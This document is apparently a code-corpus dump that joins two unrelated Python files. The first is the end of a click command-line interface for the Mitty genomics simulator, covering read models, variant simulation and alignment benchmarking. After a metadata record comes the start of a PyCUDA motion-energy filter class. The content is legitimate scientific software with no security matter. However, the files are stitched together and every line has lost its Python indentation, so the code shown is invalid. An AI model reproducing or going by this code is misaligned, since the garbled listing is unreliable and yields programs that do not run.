mvio.prepare_variant_file(vcfin, sample, bed, vcfout)
@cli.group('create-read-model', short_help='Create read model from different sources')
def create_read_model():
pass
@create_read_model.command('bam2illumina', short_help='Create read model from BAM file')
@click.argument('bam', type=click.Path(exists=True))
@click.argument('pkl')
@click.argument('desc')
@click.option('--every', type=int, default=1, help='Sample every nth read')
@click.option('--min-mq', type=int, default=0, help='Discard reads with MQ less than this')
@click.option('-t', '--threads', type=int, default=2, help='Threads to use')
@click.option('--max-bp', type=int, default=300, help='Maximum length of read')
@click.option('--max-tlen', type=int, default=1000, help='Maximum size of insert')
def bam2illumina(bam, pkl, desc, every, min_mq, threads, max_bp, max_tlen):
"""Process BAM file and create an empirical model of template length and base quality
distribution. The model is saved to a Python pickle file usable by Mitty read generation programs."""
import mitty.empirical.bam2illumina as b2m
b2m.process_bam_parallel(bam, pkl, model_description=desc, every=max(1, every), min_mq=min_mq,
threads=threads, max_bq=94, max_bp=max_bp, max_tlen=max_tlen)
@create_read_model.command('synth-illumina', short_help='Create fully synthetic Illumina-like read model')
@click.argument('pkl')
@click.option('--read-length', type=int, default=100)
@click.option('--mean-template-length', type=int, default=500)
@click.option('--std-template-length', type=int, default=50)
@click.option('--bq0', type=int, default=30, help='Maximum BQ')
@click.option('--k', type=float, default=200, help='Steepness of BQ curve. Larger => more steep')
@click.option('--sigma', type=float, default=10, help='Spread of BQ about mean value')
@click.option('--comment', help='Additional comments')
@click.option('--max-tlen', type=int, default=1000, help='Maximum template length we will generate')
def synth_read_model(pkl, read_length, mean_template_length, std_template_length, max_tlen, bq0, k, sigma, comment):
"""This generates a synthetic read model based on the parameters we pass it"""
import mitty.simulation.sequencing.syntheticsequencer as synth
synth.create_model(
pkl,
read_length=read_length,
mean_template_length=mean_template_length, std_template_length=std_template_length, max_tlen=max_tlen,
bq0=bq0, k=k, sigma=sigma, comment=comment)
@cli.command('list-read-models')
@click.option('-d', type=click.Path(exists=True), help='List models in this directory')
def list_read_models(d):
"""List read models"""
import pkg_resources
import pickle
import glob
if d is None:
if not pkg_resources.resource_isdir(__name__, 'data/readmodels/'):
logging.error('Read model directory not found in distribution!')
raise FileNotFoundError
model_list = [
pkg_resources.resource_filename(__name__, 'data/readmodels/' + model)
for model in pkg_resources.resource_listdir(__name__, 'data/readmodels/')]
else:
model_list = glob.glob(os.path.join(d, '*'))
for mod_fname in model_list:
try:
mod_data = pickle.load(open(mod_fname, 'rb'))
click.echo('\n----------\n{}:\n{}\n=========='.format(os.path.basename(mod_fname), mod_data['model_description']))
except:
logging.debug('Skipping {}. Not a read model file'.format(mod_fname))
@cli.command('describe-read-model')
@click.argument('modelfile')
@click.argument('figfile')
def describe_read_model(modelfile, figfile):
"""Plot panels describing this model"""
read_module, model = get_read_model(modelfile)
read_module.describe_model(os.path.basename(modelfile), model, figfile)
@cli.command()
def qname():
"""Display qname format"""
from mitty.simulation.sequencing.writefastq import __qname_format_details__
click.echo(__qname_format_details__)
def print_qname(ctx, param, value):
if not value or ctx.resilient_parsing:
return
qname()
ctx.exit()
@cli.command('generate-reads', short_help='Generate simulated reads.')
@click.argument('fasta')
@click.argument('vcf')
@click.argument('sample_name')
@click.argument('bed')
@click.argument('modelfile')
@click.argument('coverage', type=float)
@click.argument('seed', type=int)
@click.argument('fastq1', type=click.Path())
@click.argument('longqname', type=click.Path())
@click.option('--fastq2', type=click.Path())
@click.option('--flat-coverage', is_flag=True, help='If set ensure perfectly uniform coverage')
@click.option('--truncate-to', type=int, help='Truncate all reads to these many bp (If set)')
@click.option('--unpair', is_flag=True, help='unpair reads for models that normally produce paired reads')
@click.option('--threads', default=2)
@click.option('--qname', is_flag=True, callback=print_qname, expose_value=False, is_eager=True, help='Print documentation for information encoded in qname')
def generate_reads(fasta, vcf, sample_name, bed, modelfile,
coverage, seed,
fastq1, longqname, fastq2,
flat_coverage, truncate_to, unpair,
threads):
"""Generate simulated reads"""
import mitty.simulation.readgenerate as reads
read_module, model = get_read_model(modelfile, sub_type='-flat-coverage' if flat_coverage else '')
reads.process_multi_threaded(
fasta, vcf, sample_name, bed, read_module, model, coverage,
fastq1, longqname, fastq2,
truncate_to=truncate_to,
unpair=unpair,
threads=threads, seed=seed)
@cli.command('corrupt-reads', short_help='Apply corruption model to FASTQ file of reads')
@click.argument('modelfile')
@click.argument('fastq1_in', type=click.Path(exists=True))
@click.argument('fastq1_out', type=click.Path())
@click.argument('sidecar_in', type=click.Path(exists=True))
@click.argument('sidecar_out', type=click.Path())
@click.argument('seed', type=int)
@click.option('--fastq2-in', type=click.Path(exists=True))
@click.option('--fastq2-out', type=click.Path())
@click.option('--threads', default=2)
def read_corruption(modelfile, fastq1_in, fastq1_out, sidecar_in, sidecar_out, seed, fastq2_in, fastq2_out, threads):
"""Apply corruption model to FASTQ file of reads"""
import mitty.simulation.readcorrupt as rc
read_module, read_model = get_read_model(modelfile)
rc.multi_process(read_module, read_model, fastq1_in, fastq1_out, sidecar_in, sidecar_out,
fastq2_in, fastq2_out, processes=threads, seed=seed)
def print_variant_model_list(ctx, param, value):
import mitty.simulation.genome.simulatevariants as simvar
if not value or ctx.resilient_parsing:
return
for k in sorted(simvar.model_dispatch.keys()):
print('{}:\n------'.format(k))
print(simvar.model_dispatch[k].__doc__)
print()
ctx.exit()
@cli.command('sample-genome', short_help='Sample variants to create an individual')
@click.argument('vcf', type=click.Path(exists=True))
@click.argument('vcf-out', type=click.File('w'))
@click.option('--sample-name', type=str, default="HG")
@click.option('--default-allele-freq', default=0.01, type=float)
@click.option('--seed-for-random-number-generator', type=int)
def simulate_variants(vcf, vcf_out, sample_name, default_allele_freq, seed_for_random_number_generator):
"""Generates a VCF with random GT information based on the allele frequency (AF) of the variants. If AF is not present
for a variant, it uses default allele frequency. If a variant in input VCF contains multiallelics,
only the first ALT will be used.
"""
import mitty.simulation.genome.sampledgenome as sample_genome
sample_genome.assign_random_gt(input_vcf=vcf, output=vcf_out, sample_name=sample_name,
default_af=default_allele_freq, seed=seed_for_random_number_generator)
@cli.command('simulate-variants', short_help='Create a fully simulated VCF')
@click.argument('vcfout', type=click.File('w'))
@click.argument('fasta', type=click.Path(exists=True))
@click.argument('sample')
@click.argument('bed', type=click.Path(exists=True))
@click.argument('seed', type=int)
@click.option('--p-het', default=0.6, type=float, help='Probability for heterozygous variants')
@click.option('--model', type=(str, float, int, int), multiple=True, help='<model type> <p> <min-size> <max-size>')
@click.option('--list-models', is_flag=True, callback=print_variant_model_list, expose_value=False, is_eager=True, help='Print list of variant models')
def simulate_variants(vcfout, fasta, sample, bed, seed, p_het, model):
"""Generates a VCF with simulated variants. The program carries three basic models for variant simulation
- SNPs, insertions and deletions and is invoked as follows:
\b
mitty -v4 simulate-variants \
- \ # Write the VCF to std out
~/Data/human_g1k_v37_decoy.fasta \
mysample \ # The name of the sample to add to
region.bed \
7 \ # This is the random number generator seed
--p-het 0.6 \ # The probability for heterozygous variants
--model SNP 0.001 1 1 \ # <model type> <p> <min-size> <max-size>
--model INS 0.0001 10 100 \
--model DEL 0.0001 10 100 | bgzip -c > sim.vcf.gz
"""
import mitty.simulation.genome.simulatevariants as simvar
simvar.main(fp_out=vcfout, fasta_fname=fasta, sample_name=sample, bed_fname=bed, seed=seed, p_het=p_het, models=model)
@cli.command('god-aligner', short_help='Create a perfect BAM from simulated FASTQs')
@click.argument('fasta', type=click.Path(exists=True))
@click.argument('fastq1', type=click.Path(exists=True))
@click.argument('sidecar_in', type=click.Path(exists=True))
@click.argument('bam')
@click.option('--fastq2', type=click.Path(exists=True), help='If a paired-end FASTQ, second file goes here')
@click.option('--sample-name', default='S', help='If supplied, this is put into the BAM header')
@click.option('--platform-name', default='Illumina', help='If supplied, this is put into the BAM header')
@click.option('--cigar-v2', is_flag=True, help='Write out CIGARs in V2 for')
@click.option('--max-templates', type=int, help='For debugging: quits after processing these many templates')
@click.option('--threads', default=2)
@click.option('--do-not-index', is_flag=True, help='Leave the unsorted BAM fragments as is. Required if using an external tool to merge + sort + index')
def god_aligner(fasta, bam, sample_name, platform_name, fastq1, sidecar_in, fastq2,
cigar_v2,
max_templates,
threads,
do_not_index):
"""Given a FASTA.ann file and FASTQ made of simulated reads,
construct a perfectly aligned BAM from them.
A BAM produced by an aligner from the same FASTQ can be diff-d against the perfect BAM
to check for alignment accuracy. (Also see the mitty filter-bam tool)
The perfect BAM is also useful for testing variant callers by removing the aligner from the
pipeline and reducing one moving part.
Note: The program uses the fasta.ann file to construct the BAM header"""
import mitty.benchmarking.god_aligner as god
god.process_multi_threaded(
fasta, bam, fastq1, sidecar_in, fastq2, threads, max_templates, platform_name, sample_name,
cigar_v2=cigar_v2,
do_not_index=do_not_index)
@cli.group('debug', short_help='Alignment and variant calling debugging tools')
def debug_tools():
pass
@debug_tools.group('variant-call-analysis', short_help="Characterize TP, FN, FP and GT calls (and hence P/R) by variant size")
def variant_call_analysis():
pass
@variant_call_analysis.command('process', short_help="Process EVCF, characterize calls by variant size and plot")
@click.argument('evcf', type=click.Path(exists=True))
@click.argument('out', type=click.Path())
@click.option('--region-label', help='Name of high confidence region if desired')
@click.option('--max-size', type=int, default=50, help='Maximum size of variant to consider')
@click.option('--title', help='Title for the plot')
@click.option('--fig-file', type=click.Path(), help='If supplied, plot will be saved here')
@click.option('--plot-bin-size', type=int, help='Bin size (bp)')
def vc_process(evcf, out, region_label, max_size, title, fig_file, plot_bin_size):
import mitty.benchmarking.evcfbysize as ebs
data = ebs.main(evcf_fname=evcf, out_csv_fname=out,
max_size=max_size, high_confidence_region=region_label)
ebs.plot(data, fig_fname=fig_file, bin_size=plot_bin_size, title=title)
@variant_call_analysis.command('plot', short_help="Plot P/R from existing data file.")
@click.argument('datafile', type=click.Path(exists=True))
@click.argument('fig-file', type=click.Path())
@click.option('--title', help='Title for the plot')
@click.option('--plot-bin-size', type=int, help='Bin size (bp)')
@click.option('--plot-range', type=int, help='Range (bp) of indels to show')
def vc_process(datafile, fig_file, title, plot_bin_size, plot_range):
import mitty.benchmarking.evcfbysize as ebs
data = ebs.np.loadtxt(datafile, skiprows=1, delimiter=',', dtype=[('TP', int), ('FN', int), ('GT', int), ('FP', int)])
ebs.plot(data, fig_fname=fig_file, bin_size=plot_bin_size, plot_range=plot_range, title=title)
@debug_tools.command('variant-by-size', short_help="Characterize variant size distribution in a VCF")
@click.argument('vcf', type=click.Path(exists=True))
@click.argument('out', type=click.Path())
@click.option('--max-size', type=int, default=50, help='Maximum size of variant to consider')
@click.option('--title', help='Title for the plot')
@click.option('--fig-file', type=click.Path(), help='If supplied, plot will be saved here')
@click.option('--plot-bin-size', type=int, help='Bin size')
@click.option('--replot', is_flag=True,
help='If supplied, instead of reprocessing the vcf, we expect "out" to exist, and load data from there')
def variant_by_size(vcf, out, max_size, title, fig_file, plot_bin_size, replot):
import mitty.benchmarking.vsizedistrib as vsd
if not replot:
data = vsd.main(vcf_fname=vcf, max_size=max_size)
vsd.np.savetxt(out, data, fmt='%d', delimiter=', ', header='SIZE')
else:
data = vsd.np.loadtxt(out, skiprows=1, delimiter=',', dtype=int)
if fig_file is not None:
vsd.plot(data, fig_fname=fig_file, bin_size=plot_bin_size, title=title)
@debug_tools.command('call-fate', short_help="Tracks fate of TP, FN, FP .. between two eval VCFs")
@click.argument('vcfa', type=click.Path(exists=True))
@click.argument('vcfb', type=click.Path(exists=True))
@click.argument('vcfout', type=click.File('w'))
@click.argument('summaryout', type=click.File('w'))
@click.option('--region-label', help='Name of high confidence region if desired')
def call_fate(vcfa, vcfb, vcfout, summaryout, region_label):
"""This tool tracks the fate of every variant call across the two supplied files and divides
the calls up into the following 12 transitions
\b
Improvements
------------
FN -> TP
FN -> GT
GT -> TP
FP -> N (FP calls removed)
\b
Status quo
----------
TP -> TP
FN -> FN
GT -> GT
FP -> FP
\b
Regressions
-----------
TP -> FN
TP -> GT
GT -> FN
N -> FP (New FP calls)
"""
import mitty.benchmarking.callfate as cf
cf.main(fname_a=vcfa, fname_b=vcfb, vcf_out=vcfout, summary_out=summaryout, high_confidence_region=region_label)
def partition_bam_choices():
from mitty.benchmarking.partition_bams import scoring_fn_dict
return scoring_fn_dict.keys()
def print_partion_bam_criteria(ctx, param, value):
if not value or ctx.resilient_parsing:
return
from mitty.benchmarking.partition_bams import scoring_fn_dict
for k, v in scoring_fn_dict.items():
print('{}: {}\n'.format(k, v[1]))
ctx.exit()
@debug_tools.command('partition-bams', short_help="Given two or more BAMs partition them into mutually exclusive sets")
@click.argument('outprefix')
@click.argument('criterion', type=click.Choice(partition_bam_choices()))
@click.option('--threshold', type=float, default=10)
@click.option('--sidecar_in', type=click.Path(exists=True))
@click.option('--bam', type=click.Path(exists=True), multiple=True, help='BAMs to partition')
@click.option('--criteria', is_flag=True, callback=print_partion_bam_criteria, expose_value=False, is_eager=True, help='Print documentation for criteria')
def partition_bams(outprefix, criterion, threshold, sidecar_in, bam):
"""
An example command line for this tool is:
\b
mitty -v4 debug partition-bams
myderr \\
d_err --threshold 10 \\
--sidecar_in lq.txt --bam bwa_1.5.bam --bam bwa_10.bam --bam bwa_20.bam
This command line asks the tool to use |d_err| < 10 as the set membership function. We are passing it three BAM files
(the file names refer to the `-r` values we passed `bwa mem` (1.5, 10 and 20)) and `lq.txt` is the sidecar file carrying
the qnames > 254 characters (as described previously).
This tool produces a summary file `myderr_summary.txt` that looks like:
\b
(A)(B)(C) 22331
(A)(B)C 234
(A)B(C) 0
(A)BC 3
A(B)(C) 0
A(B)C 0
AB(C) 208
ABC 199126
In this nomenclature A is the set and (A) is the complement of this set. The set labels A, B, C ... (upto a maximum of 10)
refer to the BAM files in sequence, in this case 1.5, 10 and 20.
Thus, ABC means all the reads which have a |d_err| < 10 in all the three files. AB(C) means all the reads which have
a |d_err| < 10 in A and B but not C, and so on. A reader familiar with Venn diagrams is refered to the chart in the docs
for a translation of the three dimensional case to a three way Venn diagram. Higher dimensions are harder to visualize
as Venn diagrams.
The tool also produces a set of files following the naming convention:
\b
myderr_(A)(B)(C)_A.bam
myderr_(A)(B)(C)_B.bam
myderr_(A)(B)(C)_C.bam
myderr_(A)(B)C_A.bam
myderr_(A)(B)C_B.bam
myderr_(A)(B)C_C.bam
...
The first part of the name follows the convention outlined above. The trailing A, B, C refer to the orginal source BAM of
the reads. So `myderr_(A)(B)(C)_B.bam` carries reads from bam B that have |d_err| >= 10 in all the three BAMs.
The criteria the `partition-bam` tool can be run on can be obtained by passing it the `--criteria` option.
"""
import mitty.benchmarking.partition_bams as pbm
pbm.main(bam_in_l=bam, out_prefix=outprefix, criterion=criterion, threshold=threshold, sidecar_fname=sidecar_in)
@debug_tools.command('bam-to-truth', short_help="from input bam with mapping quality threshold to produce truth fastq and its long qname file")
@click.argument('bam_fpath_in',type=click.Path(exists=True))
@click.argument('mq_threshold',type=int)
@click.argument('sample_name')
@click.argument('output_prefix')
def bam_to_truth(bam_fpath_in,mq_threshold,sample_name,output_prefix):
"""
Given bam file and mapping quality threshold ,the tool outputs 2 fastqs with their longqnames
if both paired mate and the read have mq above.Also adds sample_name to output.
For qname format specification, check mitty Readme.MD documentation.
"""
import mitty.benchmarking.bam_to_truth as btt
btt.bam_to_truth(bam_fpath_in,mq_threshold,sample_name,output_prefix)
@debug_tools.group('alignment-analysis', short_help='Plot various alignment metrics from BAM')
def alignment_analysis():
"""Computes a three dimensional histogram of alignment metrics from a BAM of simulated reads
\b
The dimensions are:
[0] Xd - alignment error -max_xd, ... 0, ... +max_xd, wrong_chrom, unmapped
(2 * max_xd + 3)
[1] MQ - mapping quality 0, ... max_MQ
(max_MQ + 1)
[2] vlen - length of variant carried by read
Ref, < -max_vlen , -max_vlen, ... 0, ... +max_vlen, > +max_vlen
( 2 * max_vlen + 1 + 2 + 1)"""
pass
@alignment_analysis.command('process', short_help='Compute alignment metrics from BAM and plot')
@click.argument('bam', type=click.Path(exists=True))
@click.argument('long_qname_file', type=click.Path(exists=True))
@click.argument('out', type=click.Path())
@click.option('--max-d', type=int, default=200, help='Range of d_err to consider')
@click.option('--max-size', type=int, default=50, help='Maximum size of variant to consider')
@click.option('--fig-prefix', type=click.Path(), help='If supplied, a series of plots will be saved with this prefix')
@click.option('--plot-bin-size', default=1, type=int, help='Bin size')
@click.option('--strict-scoring', is_flag=True, help="Don't consider breakpoints when scoring alignment")
@click.option('--processes', default=2, help='How many processes to use for computation')
def alignment_debug_plot(bam, long_qname_file, out, max_d, max_size, fig_prefix, plot_bin_size, strict_scoring, processes):
"""Computes 3D matrix of alignment metrics (d_err, MQ, v_size) saves it to a numpy array file and produces a set
of summary figures"""
# For automated workflows we sometimes have real (not simulated) data. For such workflows we simply
# plot a placeholder figure to include in reports by passing a dummy long qname with the magic word
# 'deadbeef' in it
if open(long_qname_file, 'r').read().strip() == 'deadbeef':
if fig_prefix is not None:
import mitty.benchmarking.plot.placeholderfigure as phf
phf.placeholder_figure('NOT SIMULATED READS', fig_prefix=fig_prefix)
exit(0)
import mitty.benchmarking.xmv as xmv
xmv_mat = xmv.main(bam, sidecar_fname=long_qname_file,
max_xd=max_d, max_vlen=max_size, strict_scoring=strict_scoring,
processes=processes)
xmv.save(xmv_mat, out)
if fig_prefix is not None:
xmv.plot_figures(xmv_mat, fig_prefix=fig_prefix, plot_bin_size=plot_bin_size)
@alignment_analysis.command('plot', short_help='Plot alignment metrics from existing data file')
@click.argument('datafile', type=click.Path(exists=True))
@click.argument('fig-prefix', type=click.Path())
@click.option('--plot-bin-size', default=1, type=int, help='Bin size')
def alignment_debug_plot(datafile, fig_prefix, plot_bin_size):
"""Produces a set of alignment metric summary figures from existing data file"""
import mitty.benchmarking.xmv as xmv
xmv_mat = xmv.np.load(datafile)
xmv.plot_figures(xmv_mat, fig_prefix=fig_prefix, plot_bin_size=plot_bin_size)
@debug_tools.command('subset-bam', short_help="Subset a BAM based on d_err and variant size")
@click.argument('bamin', type=click.Path(exists=True))
@click.argument('sidecar', type=click.Path(exists=True))
@click.argument('bamout', type=click.Path())
@click.option('--d-range', type=(int, int), default=(-200, 200))
@click.option('--reject-d-range', is_flag=True, help='Reject reads inside the range instead of outside')
@click.option('--v-range', type=(int, int), default=(-200, 200))
@click.option('--reject-v-range', is_flag=True, help='Reject reads inside the range instead of outside')
@click.option('--reject-reads-with-variants', is_flag=True, help='Reject any reads carrying variants')
@click.option('--reject-reference-reads', is_flag=True, help='Reject reads with no variants')
@click.option('--do-not-index', is_flag=True, help='Do not index BAM file')
@click.option('--strict-scoring', is_flag=True, help="Don't consider breakpoints when scoring alignment")
@click.option('--processes', default=2, help='How many processes to use for computation')
def subset_bam(bamin, sidecar, bamout,
d_range, reject_d_range,
v_range, reject_v_range,
reject_reads_with_variants, reject_reference_reads,
strict_scoring,
do_not_index, processes):
"""Produce a subset of an input BAM based on d_err and variant size"""
import mitty.benchmarking.subsetbam as sub
assert d_range[0] <= d_range[1], 'd_range error ({})'.format(d_range)
assert v_range[0] <= v_range[1], 'v_range error ({})'.format(v_range)
assert not (reject_reads_with_variants and reject_reference_reads), 'Can not reject both variant and reference reads'
sub.main(bam_fname=bamin, sidecar_fname=sidecar, out_fname=bamout,
d_range=d_range, reject_d_range=reject_d_range,
v_range=v_range, reject_v_range=reject_v_range,
reject_reads_with_variants=reject_reads_with_variants,
reject_reference_reads=reject_reference_reads,
strict_scoring=strict_scoring, do_not_index=do_not_index, processes=processes)
def get_read_model(modelfile, sub_type=''):
"""Return read module and model data given modelfile
:param modelfile:
:param sub_type: Some modification of the model. Currently restricted to '-flat-coverage' for 'illumina'
:return:
"""
import pickle
import pkg_resources
# These are hard coded for now, might use entry points like before to pip install models
import mitty.simulation.illumina
import mitty.simulation.sequencing.flat_illumina
if pkg_resources.resource_exists(__name__, 'data/readmodels/' + modelfile):
logging.debug('Found model {} in builtins'.format(modelfile))
mod_fname = pkg_resources.resource_filename(__name__, 'data/readmodels/' + modelfile)
else:
logging.debug('Treating {} as literal path to model file'.format(modelfile))
mod_fname = modelfile # treat this as a literal file path
model = pickle.load(open(mod_fname, 'rb'))
read_module = {
'illumina': mitty.simulation.illumina,
'illumina-flat-coverage': mitty.simulation.sequencing.flat_illumina,
}.get(model['model_class'] + sub_type)
return read_module, model
@cli.group('utils', short_help='Miscellaneous utilities')
def utils():
pass
@utils.command('retruncate-qname', short_help='Given a BAM of FASTQ')
@click.argument('mainfile-in', type=click.Path(exists=True))
@click.argument('sidecar-in', type=click.Path(exists=True))
@click.argument('mainfile-out', type=click.Path())
@click.argument('sidecar-out', type=click.Path())
@click.option('--truncate-to', type=int, default=240)
@click.option('--file-type', type=click.Choice(['BAM', 'FASTQ']), help='If supplied overrides autodetection')
def retruncate_qname(mainfile_in, sidecar_in, mainfile_out, sidecar_out, truncate_to, file_type):
"""Given a FASTQ (or BAM) and a long-qnames file trancate the qnames to
whatever length we want and push the too-long qnames to the overflow
file. Also convert any old style qnames (not ending in a *) to new style
ones with a proper termination character"""
import mitty.empirical.qnametruncate as qt
qt.main(mainfile_in, sidecar_in, mainfile_out, sidecar_out, truncate_to=truncate_to, file_type=file_type)
@utils.command('vcf-complexity', short_help='Annotate variants with complexity measures')
@click.argument('vcfin', type=click.Path(exists=True))
@click.argument('vcfout', type=click.Path())
@click.argument('ref', type=click.Path(exists=True))
@click.argument('bg', type=click.Path(exists=True))
@click.option('--window-size', type=int, default=100, help='Window size of SE and LC computation')
def vcf_complexity(vcfin, vcfout, ref, bg, window_size):
"""Annotate variants with complexity measures"""
import mitty.benchmarking.complexity as cplx
cplx.vcf_complexity(
vcf_in_fname=vcfin, vcf_out_fname=vcfout,
ref_fname=ref, bg_fname=bg, window_size=window_size)
@utils.command('gc-cov')
@click.argument('bam', type=click.Path(exists=True))
@click.argument('fasta', type=click.Path(exists=True))
@click.argument('pkl')
@click.option('-b', '--block-len', type=int, default=10000, help='Block size for GC/cov computation')
@click.option('-t', '--threads', type=int, default=1, help='Threads to use')
def gc_cov(bam, fasta, pkl, block_len, threads):
"""Calculate GC content vs coverage from a BAM. Save in pickle file"""
import mitty.empirical.gc as megc
megc.process_bam_parallel(bam, fasta, pkl, block_len=block_len, threads=threads)
@utils.command('bq')
@click.argument('bam', type=click.Path(exists=True))
@click.argument('pkl')
@click.option('-t', '--threads', type=int, default=1, help='Threads to use')
def sample_bq(bam, pkl, threads):
"""BQ distribution from BAM"""
import mitty.empirical.bq as bbq
bbq.process_bam_parallel(bam, pkl, threads=threads)
@utils.command('filter-eval-vcf', short_help='Split out the FP and FN from an eval.vcf')
@click.argument('vcfin', type=click.Path(exists=True))
@click.argument('outprefix')
def filter_eval_vcf(vcfin, outprefix):
"""Subset VCF for given sample, apply BED file and filter out complex variants
making it suitable to use for read generation"""
import mitty.benchmarking.filterevalvcf as fev
fev.extract_fp_fn(vcfin, outprefix)
@utils.command('qname-stats', short_help='Given a FASTQ + side-car show us qname distribution')
@click.argument('fastq', type=click.Path(exists=True))
@click.argument('sidecar', type=click.Path(exists=True))
@click.option('--max-expected-qname', type=int, default=500, help='qname bin upper bound')
def qname_stats(fastq, sidecar, max_expected_qname):
"""A simple routine to load in a FASTQ file and give us the distribution of
qname lengths, because I was curious"""
import mitty.empirical.qnamestats as qs
qname_count = qs.main(fastq_fname=fastq, qname_overflow_fname=sidecar,
max_expected_qname_length=max_expected_qname)
for n, ql in enumerate(qname_count):
print('{}, {}'.format(n, ql))
|
sbg/Mitty
|
mitty/cli.py
|
Python
|
apache-2.0
| 30,231
|
[
"BWA"
] |
3e614a23038a465232582599f89f3d712f3e20d38b52356640f52c5e079d297d
|
# import and init CUDA
import pycuda.autoinit
import pycuda.driver as cuda
import numpy as np
import Image
from pylab import show, imshow
import logging
logging.basicConfig(format='%(levelname)s: %(message)s',
level=logging.WARNING)
# motion energy device code
# SourceModule stored in variable mod
# from motion_energy_device import *
from device import *
# CUDA helper functions for alignment
# from cuda_helper import *
def iDivUp(a, b):
# Round a / b to nearest higher integer value
a = np.int32(a)
b = np.int32(b)
return (a / b + 1) if (a % b != 0) else (a / b)
class MotionEnergy:
"""Documentation for a class
More details.
"""
sizeofFloat = 4
##########################################################################
# CONSTRUCTOR / DESTRUCTOR
##########################################################################
def __init__(self, nrX, nrY, nrC):
"""The constructor."""
# load params and scaling factors
self._initParams()
self.nrX = nrX
self.nrY = nrY
self.nrC = nrC
assert nrX >= self.minNrX, "nrX must be >= %r" % self.minNrX
assert nrY >= self.minNrY, "nrY must be >= %r" % self.minNrY
# \TODO implement RGB support
assert nrC == 1, "number of channels (%r) must be 1 (grayscale)" % nrC
# initialize CUDA and establish context
self._initCUDA()
# initialize Motion Energy
self._initME()
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
"""The destructor."""
# clean up
self.d_resp.free()
self.d_respV1c.free()
self.d_stim.free()
self.d_stimBuf.free()
self.d_diffV1GausBufT.free()
self.d_scalingStimBuf.free()
self.d_v1GausBuf.free()
self.d_diffV1GausBuf.free()
self.d_pop.free()
for file in self.files:
os.unlink(file)
##########################################################################
# PUBLIC METHODS
##########################################################################
def calcV1complex(self, stim, speed):
"""Compute V1 complex cell responses of a frame."""
# allocate stim on device
self._loadInput(stim)
# convolve the stimulus with separate V1 filters
self._calcV1linear()
# rectify linear response to get V1 simple cell firing rate
self._calcV1rect()
# spatial pooling to get V1 complex
self._calcV1blur()
# divisive normalization
self._calcV1normalize()
# steer filters in specified directions
self._calcV1direction(speed)
# get data from device
res = np.zeros(self.nrX*self.nrY*self.nrDirs).astype(np.float32)
cuda.memcpy_dtoh(res, self.d_respV1c)
return res
##########################################################################
# "PRIVATE" METHODS
##########################################################################
def _accumDiffStims(self, d_resp_tmp, diffV1GausBuf, sizes, orderX,
orderY, orderT):
""" Gets the responses of the filters specified in d_v1popDirs by
interpolation.
This is basically what shSwts.m did in the original S&H code."""
# a useful list of factorials for computing the scaling factors for
# the derivatives
factorials = (1, 1, 2, 6)
# the scaling factor for this directional derivative
# similar to the binomial coefficients
scale = 6/factorials[orderX]/factorials[orderY]/factorials[orderT]
gdim = (int(iDivUp(sizes[0] * sizes[1], 256)), 1)
bdim = (256, 1, 1)
self.dev_accumDiffStims(
np.intp(d_resp_tmp),
np.intp(diffV1GausBuf),
np.int32(sizes[0] * sizes[1]),
np.int32(scale),
np.int32(orderX),
np.int32(orderY),
np.int32(orderT),
block=bdim, grid=gdim)
def _calcV1linear(self):
# compute the V1 simple cell response at different spatial scales
# the i-th scale blurs and downsamples the image (i-1) times
logging.debug('calcV1linear')
sbuf = np.zeros(self.nrX * self.nrY * self.nrT).astype(np.float32)
cuda.memcpy_dtoh(sbuf, self.d_scalingStimBuf)
for scale in xrange(1, self.nrScales + 1):
# blur/scale the image... each time this is called stim is
# blurred more
# scale==1 --> original image resolution
# list includes self.nrScales
if scale > 1:
# convolve d_scalingStimBuf by scalingFilt in 3D
d_tmp = cuda.mem_alloc(self.szXY * self.nrT)
sizes = (self.nrX, self.nrY, self.nrT)
self._conv3D(
self.d_scalingStimBuf,
d_tmp,
sizes,
self.d_scalingFilt,
np.int32(self.scalingFiltSize))
cuda.memcpy_dtod(self.d_scalingStimBuf, d_tmp,
self.szXY * self.nrT)
d_tmp.free() # this is a little silly, because the result
# ends up in d_resp
# nrT is 9, v1GaussFiltSize is 9, so we're taking
# d_scalingStimBuf[0 ... 0+nrX*nrY*9]
# since nrT could be greater than v1GaussFiltSize, we take "only
# the part we want", quote Micah comment
gdim = (int(iDivUp(self.nrX * self.nrY * self.v1GaussFiltSize,
256)), 1)
bdim = (256, 1, 1)
stimBufPt_dst = np.intp(self.d_v1GausBuf)
offset = self.szXY * ((self.nrT - self.v1GaussFiltSize)/2)
stimBufPt_src = np.intp(self.d_scalingStimBuf) + offset
self.dev_memcpy_dtod(np.intp(stimBufPt_dst),
np.intp(stimBufPt_src),
np.int32(self.nrX * self.nrY *
self.v1GaussFiltSize),
block=bdim,
grid=gdim)
# convolve d_v1GausBuf by v1Gaus in 3D
d_tmp = cuda.mem_alloc(self.szXY * self.v1GaussFiltSize)
sizes = (self.nrX, self.nrY, self.v1GaussFiltSize)
self._conv3D(
self.d_v1GausBuf,
d_tmp,
sizes,
self.d_v1GaussFilt,
np.int32(self.v1GaussFiltSize))
cuda.memcpy_dtod(self.d_v1GausBuf, d_tmp,
self.szXY * self.v1GaussFiltSize)
# go through and calculate all directional derivatives and then
# combine them to calculate the different space-time oriented
# filters
for orderT in xrange(0, 3 + 1):
# reset diffV1GausBufT back to the 3D gaussian filtered
# version
cuda.memcpy_dtod(self.d_diffV1GausBufT, self.d_v1GausBuf,
self.szXY * self.v1GaussFiltSize)
if orderT > 0:
# take the derivative
# sizes = (self.nrX, self.nrY, self.v1GaussFiltSize)
self._diff(self.d_diffV1GausBufT, sizes, orderT, 2)
for orderY in xrange(0, 3 - orderT + 1):
orderX = 3 - orderY - orderT
cuda.memcpy_dtod(self.d_diffV1GausBuf,
self.d_diffV1GausBufT,
self.szXY * self.v1GaussFiltSize)
if orderX > 0:
self._diff(self.d_diffV1GausBuf, sizes, orderX, 0)
if orderY > 0:
self._diff(self.d_diffV1GausBuf, sizes, orderY, 1)
# combine the directional derivative by the direction of
# the space-time filter
# this is basically doing what shSwts.m did in the
# original S&H code
off1 = (scale - 1) * self.szXY * self.nrFilters
off2 = self.szXY * self.v1GaussFiltSize/2
d_respPtr = np.intp(self.d_resp) + off1
d_diffV1GausBufPtr = np.intp(self.d_diffV1GausBuf) + off2
self._accumDiffStims(d_respPtr, d_diffV1GausBufPtr, sizes,
orderX, orderY, orderT)
# \NOTE the scaling factor scaleV1linear will be applied in
# calcV1rect()
# consider edge effects
# suppress filter responses at pixel locations close to image border
length = self.nrX * self.nrY * self.nrFilters * self.nrScales
gdim = (int(iDivUp(length, 256)), 1)
